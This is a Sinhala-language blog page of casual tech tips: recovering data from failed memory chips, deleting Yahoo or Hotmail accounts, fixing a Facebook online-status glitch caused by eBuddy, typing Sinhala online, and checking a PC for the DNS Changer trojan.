හිටපු ගමන් ලොකු ලොකු ප්‍රශ්ණ වෙනවනේ අපිට, මෙමරි චිප් හිටපු ගමන් අවුල් යනවා, අපිට අයිති දේවල් නැති වෙලා යනව,ඒකට පොඩි විසදුමක් තමයි මේක,මේකෙන් ගොඩක් දුරට ඒ දේවල් අයෙත් ලබා ගන්න පුලුවන්, හැබැයි හොදමදේ තමයි, Backup එකක් අරන් තියා ගන්න එක,
මෙතනින් ගන්න

think and do it and try it
~~esh~~

Email Account සදහටම අයින් කරල දාන්න ඔනේද?



සමහර අයට හිටපු ගමන් තමන්ගේ Email ලිපිනය සදහටම අයින් කරල දාන්න ඔනේ වෙනවා, මෙතන තියනව Yahoo එකෙයි Hotmail එකේයි ලින්ක් දෙක, උවමනාවක් නැත්තම් මේ ලින්ක් Click කරන්න එපා වැරදිලවත්, සොරි තමයි,


Yahoo



» Go to: මෙතනට යන්න
» Sign In using your Yahoo! ID
» Scroll down to the end page
» Put your password into the first box
» Inset the code seen in the box
» Click "Terminate this Account"



HotMail

ebuddy නිසා ෆේස්බුක් නිතරම ඔන්ලයින් පෙන්වීමේ දෝෂයට පොඩි විසදුමක්





ebuddy එකට වෙලා දැන්  කට්ටිය හැම වෙලාවෙම චැට් කරනවනේ, එත් හිටපු ගමන් ෆෝන් වලින් ෆේස්බුක් ඔන්ලයින් එන අයට තියන ප්‍රශ්ණයක් තමයි නිතරම තමාව ඔන්ලයින් පෙන්වීම.මේක වෙන්නේ  ebuddy වල චැට් disconnect උනහම, 
එහෙම ඔන්ලයින් පෙන්නන්න ගත්තම ඉතින් කම්පියුටරෙන් ඒ අකවුන්ට් එකට ලොග් වෙලා ලොග් අවුට් කරත් එකදිගට ඔන්ලයින් පෙන්නනවා. ඒක තමයි ලොකුම ප්‍රශ්ණය, යාලුවො හිතන්නේ ඔයා ඔන්ලයින් ඉන්නවා කියලා, එත් ඔයා කතා කරන්නේ නැති නිසා තරහ වෙනවා, ඒකනේ අවුල, මේකට තියන විසදුම තමයි ඒ Account ඒක deativate කරලා ආපහු activate කරන ඒක.එහෙම කරාම වැඩේ හරි

think and do it and try it
~~esh~~

කැමතිද සින්හලෙන් Type කරන්න?

ගොඩක් අය ආසයි සින්හලෙන් type කරන්න, ඒත් සමහර අය දන්නෙ නැහැ මේක කරන හැටි, වැඩි කතා ඔනේ නැ, මේ පහල තියන ලින්ක් එකට යන්න, මෙකෙන් ඔන්ලයින්ම මේක කර ගන්න පුලුවන්, මේක කරන්නේ කොලඹ විශ්වවිද්‍යායෙන්,නියමයි

මෙතනයි තැන
හරිම ලේසියි
think and do it and try it
~~esh~~

Virus Virus පරිස්සම් වෙන්න



දැන් අලුතෙන් නෙට් එකට DNS Chenger Virus කියල දෙයක් ඇවිත් තියනවා, මේකෙන් අපේ මැෂින් එකේ DNS වෙනස් කරනවා..ඒක නිසා Federal Bureau of Investigation (FBI) එකෙන් මේ වයිරස් එක තියෙන කොම්පියුටර් හොයල ඒවා අන්තර්ජාලයෙන් ඉවත් කරනවලු, ඇත්තද කියලනම් හරියටම දන්නෙ නැහැ, ඒත් කොකටත් පරිස්සම් වෙන එක හොදයිනේ, දැනටමත් ලොව පුරා භාවිත වන පුද්ගලික පරිගණක තුන්ලක්‍ෂ පනස්‌ දහසක්‌ පමණ පියවි ඇසට දිස්‌ නොවන මෙන්ම හඳුනාගත නොහැකි “DNS Changer” නමැති ට්‍රෝජන් වර්ගයේ පරිගණක වයිරසයෙන් ආසාදනය වී ඇති බව අනාවරණය වී තිබේ.
කොකටත් අපි මේක බලා ගන්න එක හොදයිනේ ඔයාලත්ය් පුළුවන් ඔයාගේ කොම්පියුටර් එකටත් මේ වයිරස් එක ආවද කියලා බලන්න,


මෙහෙම අවොත්නම් බය වෙන්න දෙයක් නැ, 
ඔය පල තියෙන ලින්ක් එක උඩ ක්ලික් කරන්න එතකොට ඕපන් වෙන වින්ඩෝ එක green වුනොත් වයිරස් එක ඔයාගේ PC එකට තාම ඇවිත් නෑ .හැබැයි RED වුනොත් වයිරස් එක තියෙනවා..මෙන්න ලින්ක් එක
Click Here

ඇමරිකා එක්‌සත් ජනපද Federal Bureau of Investigation (FBI) විසින් මෙම ආසාදිත පරිගණකවලට නිසි පරිදි ක්‍රියාත්මක වීම සඳහා සකස්‌ කර දී තිබූ විකල්ප තාවකාලික පරිගණක පාලක පද්ධතීන් (ස්‌වර්ස්‌) ජුලි 09 වැනිදා සිට වසා දැමීමට තීරණය කර ඇත, එදාට පස්සේ මොන වෙයිද?
~~esh~~